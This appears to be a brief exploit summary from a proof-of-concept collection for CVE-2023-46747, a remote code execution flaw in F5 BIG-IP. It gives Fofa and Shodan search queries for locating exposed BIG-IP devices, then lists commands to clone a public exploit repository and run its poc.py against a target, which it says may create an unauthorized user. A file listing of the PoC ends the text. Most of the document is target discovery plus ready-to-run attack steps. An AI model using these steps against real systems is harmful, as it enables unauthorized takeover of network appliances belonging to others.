# CVE-2023-46747-RCE-poc Vulnerability Summary
## Detection Methods
- **Fofa**: `(title="BIG-IP®" || icon_hash="-335242539")`
- **Shodan**: `title:"BIG-IP®"`
## Affected Versions
Refer to: [F5 Security Advisory](https://my.f5.com/manage/s/article/K000137353)
## Exploit Steps
1. Clone the exploit repository:
```
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python poc.py -u https://target-ip
```
2. The exploit may successfully create a new user without authorization.
[4.0K] /data/pocs/749f03d40b681fe9e9a7419ae1069a0ccff39d57
├── [ 11K] LICENSE
├── [4.2K] poc.py
└── [ 571] README.md
0 directories, 3 files